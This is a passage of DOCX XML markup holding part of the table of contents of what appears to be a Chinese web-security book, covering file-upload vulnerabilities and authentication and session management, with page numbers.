        <w:t>述</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>180</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="-31"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FCKEditor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>文件上传漏洞谈起</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>181</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>绕过文件上传检查功能</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>182</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1523" w:val="left" w:leader="none"/>
          <w:tab w:pos="1524" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="57" w:after="0"/>
        <w:ind w:left="1523" w:right="0" w:hanging="492"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>功</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>能还</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>漏洞</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>183</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2122" w:val="left" w:leader="none"/>
          <w:tab w:pos="2124" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="80" w:after="0"/>
        <w:ind w:left="2123" w:right="0" w:hanging="598"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>文件解析问题</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>184</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="82" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IIS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>文件解析问题</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>185</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CGI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>路径解析问题</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>187</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2120" w:val="left" w:leader="none"/>
          <w:tab w:pos="2121" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2120" w:right="0" w:hanging="595"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>利用上传文件钓鱼</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>189</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1523" w:val="left" w:leader="none"/>
          <w:tab w:pos="1524" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="57" w:after="0"/>
        <w:ind w:left="1523" w:right="0" w:hanging="492"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>设</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>计安</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>全</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>的文</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>上传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>功</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>能</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>190</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1523" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="56"/>
        <w:ind w:left="1031" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="position:absolute;margin-left:12.72pt;margin-top:19.639986pt;width:411.15pt;height:16.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:1696" coordorigin="254,393" coordsize="8223,322">
            <v:rect style="position:absolute;left:254;top:392;width:8223;height:322" filled="true" fillcolor="#dadada" stroked="false">
              <v:fill type="solid"/>
            </v:rect>
            <v:shape style="position:absolute;left:1195;top:414;width:7261;height:277" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:pos="7240" w:val="right" w:leader="dot"/>
                      </w:tabs>
                      <w:spacing w:line="276" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>认</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="7"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>证</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>与</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="7"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>会</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>话</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="7"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>管</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>理</w:t>
                      <w:tab/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:spacing w:val="5"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>192</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <v:shape style="position:absolute;left:283;top:460;width:688;height:236" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="236" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>第 </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>9</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="-35"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t> </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>章</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <w10:wrap type="none"/>
          </v:group>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>8.4</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>小结</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>191</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1522" w:val="left" w:leader="none"/>
          <w:tab w:pos="1524" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="558" w:after="0"/>
        <w:ind w:left="1523" w:right="0" w:hanging="492"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Who</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>am</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>I?</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>192</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1523" w:val="left" w:leader="none"/>
          <w:tab w:pos="1524" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="59" w:after="0"/>
        <w:ind w:left="1523" w:right="0" w:hanging="492"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>密</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>码的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>那</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>些事儿</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>193</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1523" w:val="left" w:leader="none"/>
          <w:tab w:pos="1524" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
        <w:ind w:left="1523" w:right="0" w:hanging="492"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>多</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>因素</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>认</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>证</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>195</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1525" w:val="left" w:leader="none"/>
          <w:tab w:pos="1526" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
        <w:ind w:left="1525" w:right="0" w:hanging="494"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>与认证</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>196</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1525" w:val="left" w:leader="none"/>
          <w:tab w:pos="1526" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
        <w:ind w:left="1525" w:right="0" w:hanging="494"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Session Fixation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="15"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>攻击</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>198</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1525" w:val="left" w:leader="none"/>
          <w:tab w:pos="1526" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="55" w:after="0"/>
        <w:ind w:left="1525" w:right="0" w:hanging="494"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>保持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>攻</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>击</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>199</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1523" w:val="left" w:leader="none"/>
          <w:tab w:pos="1524" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
        <w:ind w:left="1523" w:right="0" w:hanging="492"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>点登</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SSO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
